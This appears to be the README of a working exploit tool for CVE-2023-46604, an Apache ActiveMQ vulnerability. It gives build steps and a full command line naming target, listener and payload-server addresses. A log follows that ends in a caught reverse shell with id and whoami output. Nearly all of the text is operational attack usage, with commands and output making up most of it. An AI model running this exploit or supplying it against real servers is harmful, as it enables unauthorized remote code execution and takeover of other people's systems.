CVE-2023-46604 is a widely exploited vulnerability that appears on CISA's KEV list. This go-exploit implementation can execute a reverse shell on the targets using a Nashorn payload, or download a binary to the target and execute it.
To build the exploit into a docker image simply:
make docker
If you have a Go build environment handy, you can also just use make
:
albinolobster@mournland:~/cve-2023-46604$ make
gofmt -d -w cve-2023-46604.go
golangci-lint run --fix cve-2023-46604.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-46604_linux-arm64 cve-2023-46604.go
albinolobster@mournland:~/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -v -c -e -rhost 10.9.49.129 -rport 61616 -lhost 10.9.49.131 -lport 1270 -httpAddr 10.9.49.131 -c2 SimpleShellServer
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.129 port=61616 ssl=false "ssl auto"=false
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Validating ActiveMQ target" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.398-05:00 level=SUCCESS msg="Target validation succeeded!" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.398-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.465-05:00 level=VERSION msg="The self-reported version is: 5.18.2" host=10.9.49.129 port=61616 version=5.18.2
time=2023-11-09T16:07:48.465-05:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.465-05:00 level=STATUS msg="HTTP server listening for 10.9.49.131:8080/JbmoWIDSyYqW"
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg=Connecting...
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg="Sending exploit"
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg="Exploit successfully completed"
time=2023-11-09T16:07:50.510-05:00 level=STATUS msg="Sending payload"
time=2023-11-09T16:07:50.516-05:00 level=STATUS msg="Sending payload"
time=2023-11-09T16:07:50.657-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.129:37034"
time=2023-11-09T16:07:50.657-05:00 level=STATUS msg="Active shell from 10.9.49.129:37034"
id
uid=1000(albinolobster) gid=1000(albinolobster) groups=1000(albinolobster),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare)
whoami
albinolobster